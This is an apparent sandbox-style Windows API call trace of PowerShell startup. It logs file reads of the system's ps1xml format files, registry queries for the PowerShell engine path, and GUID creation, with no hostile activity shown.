	[0647.732] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.732] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.732] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.732] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.734] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.734] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.735] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.735] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.735] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.736] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.736] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.736] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.739] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.739] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.740] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.740] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.740] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.741] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.741] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.741] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.742] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.742] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.742] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.743] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.743] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.743] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.744] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.744] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.749] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.749] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.752] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.752] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.752] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.753] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.753] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.754] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0647.754] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x1b4, lpOverlapped=0x0) returned 1
	[0647.754] ReadFile (in: hFile=0x314, lpBuffer=0x2d65e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2d65e78*, lpNumberOfBytesRead=0x16d5c8*=0x0, lpOverlapped=0x0) returned 1
	[0647.754] CloseHandle (hObject=0x314) returned 1
	[0647.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0647.754] SetErrorMode (uMode=0x1) returned 0x1
	[0647.755] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d540 | out: lpFileInformation=0x16d540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0647.755] SetErrorMode (uMode=0x1) returned 0x1
	[0647.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0647.755] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d628 | out: phkResult=0x16d628*=0x314) returned 0x0
	[0647.755] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d5ac, lpData=0x0, lpcbData=0x16d5a8*=0x0 | out: lpType=0x16d5ac*=0x1, lpData=0x0, lpcbData=0x16d5a8*=0x56) returned 0x0
	[0647.755] CoTaskMemAlloc (cb=0x5a) returned 0x1b8cabc0
	[0647.755] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d57c, lpData=0x1b8cabc0, lpcbData=0x16d578*=0x56 | out: lpType=0x16d57c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d578*=0x56) returned 0x0
	[0647.755] CoTaskMemFree (pv=0x1b8cabc0) 
	[0647.755] RegCloseKey (hKey=0x314) returned 0x0
	[0647.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0647.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0649.693] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0649.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.693] CoTaskMemFree (pv=0x2f94d0) 
	[0649.706] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d7c8 | out: phkResult=0x16d7c8*=0x2fc) returned 0x0
	[0649.707] RegQueryValueExW (in: hKey=0x2fc, lpValueName="path", lpReserved=0x0, lpType=0x16d7dc, lpData=0x0, lpcbData=0x16d7d8*=0x0 | out: lpType=0x16d7dc*=0x1, lpData=0x0, lpcbData=0x16d7d8*=0x74) returned 0x0
	[0649.707] RegQueryValueExW (in: hKey=0x2fc, lpValueName="path", lpReserved=0x0, lpType=0x16d74c, lpData=0x0, lpcbData=0x16d748*=0x0 | out: lpType=0x16d74c*=0x1, lpData=0x0, lpcbData=0x16d748*=0x74) returned 0x0
	[0649.707] CoTaskMemAlloc (cb=0x78) returned 0x292070
	[0649.707] RegQueryValueExW (in: hKey=0x2fc, lpValueName="path", lpReserved=0x0, lpType=0x16d71c, lpData=0x292070, lpcbData=0x16d718*=0x74 | out: lpType=0x16d71c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d718*=0x74) returned 0x0
	[0649.707] CoTaskMemFree (pv=0x292070) 
	[0649.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0649.707] SetErrorMode (uMode=0x1) returned 0x1
	[0649.707] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d6a0 | out: lpFileInformation=0x16d6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0649.707] SetErrorMode (uMode=0x1) returned 0x1
	[0649.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0649.709] SetErrorMode (uMode=0x1) returned 0x1
	[0649.709] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d6a0 | out: lpFileInformation=0x16d6a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0649.709] SetErrorMode (uMode=0x1) returned 0x1
	[0649.710] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0649.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.710] CoTaskMemFree (pv=0x2f94d0) 
	[0649.714] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0649.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.714] CoTaskMemFree (pv=0x2f94d0) 
	[0649.715] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0649.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.715] CoTaskMemFree (pv=0x2f94d0) 
	[0649.717] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0649.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.717] CoTaskMemFree (pv=0x2f94d0) 
	[0649.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0649.719] SetErrorMode (uMode=0x1) returned 0x1
	[0649.719] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0649.719] GetFileType (hFile=0x314) returned 0x1
	[0649.719] SetErrorMode (uMode=0x1) returned 0x1
	[0649.719] GetFileType (hFile=0x314) returned 0x1
	[0649.719] ReadFile (in: hFile=0x314, lpBuffer=0x340d790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x340d790*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0651.353] ReadFile (in: hFile=0x314, lpBuffer=0x340d790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x340d790*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0651.354] ReadFile (in: hFile=0x314, lpBuffer=0x340d790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x340d790*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0651.354] ReadFile (in: hFile=0x314, lpBuffer=0x340d790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x340d790*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0651.355] ReadFile (in: hFile=0x314, lpBuffer=0x340d790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x340d790*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0651.355] ReadFile (in: hFile=0x314, lpBuffer=0x340d790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x340d790*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0651.355] ReadFile (in: hFile=0x314, lpBuffer=0x340d790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x340d790*, lpNumberOfBytesRead=0x16d338*=0x9e2, lpOverlapped=0x0) returned 1
	[0651.355] ReadFile (in: hFile=0x314, lpBuffer=0x340ccda, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x340ccda*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0651.355] ReadFile (in: hFile=0x314, lpBuffer=0x340d790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x340d790*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0651.355] CloseHandle (hObject=0x314) returned 1
	[0651.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0651.356] SetErrorMode (uMode=0x1) returned 0x1
	[0651.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d2e0 | out: lpFileInformation=0x16d2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0651.356] SetErrorMode (uMode=0x1) returned 0x1
	[0651.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0651.356] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3c8 | out: phkResult=0x16d3c8*=0x314) returned 0x0
	[0651.356] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d34c, lpData=0x0, lpcbData=0x16d348*=0x0 | out: lpType=0x16d34c*=0x1, lpData=0x0, lpcbData=0x16d348*=0x56) returned 0x0
	[0651.356] CoTaskMemAlloc (cb=0x5a) returned 0x2edc30
	[0651.356] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d31c, lpData=0x2edc30, lpcbData=0x16d318*=0x56 | out: lpType=0x16d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d318*=0x56) returned 0x0
	[0651.356] CoTaskMemFree (pv=0x2edc30) 
	[0651.356] RegCloseKey (hKey=0x314) returned 0x0
	[0651.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0651.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0651.366] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xca83f746, Data2=0x47e4, Data3=0x43db, Data4=([0]=0x91, [1]=0x8, [2]=0xa5, [3]=0xd2, [4]=0xa3, [5]=0x61, [6]=0xd3, [7]=0x30))) returned 0x0
	[0651.381] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x699ec77d, Data2=0x69d5, Data3=0x4b8b, Data4=([0]=0xa3, [1]=0x18, [2]=0x5b, [3]=0xd3, [4]=0x25, [5]=0x19, [6]=0x4e, [7]=0xfc))) returned 0x0
	[0651.383] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0651.383] GetFileType (hFile=0x314) returned 0x1
	[0651.383] SetErrorMode (uMode=0x1) returned 0x1
	[0651.383] GetFileType (hFile=0x314) returned 0x1
	[0651.384] ReadFile (in: hFile=0x314, lpBuffer=0x34382f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x34382f8*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0651.386] ReadFile (in: hFile=0x314, lpBuffer=0x34382f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x34382f8*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0653.090] ReadFile (in: hFile=0x314, lpBuffer=0x34382f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x34382f8*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0653.091] ReadFile (in: hFile=0x314, lpBuffer=0x34382f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x34382f8*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0653.091] ReadFile (in: hFile=0x314, lpBuffer=0x34382f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x34382f8*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0653.093] ReadFile (in: hFile=0x314, lpBuffer=0x34382f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x34382f8*, lpNumberOfBytesRead=0x16d338*=0xfb2, lpOverlapped=0x0) returned 1
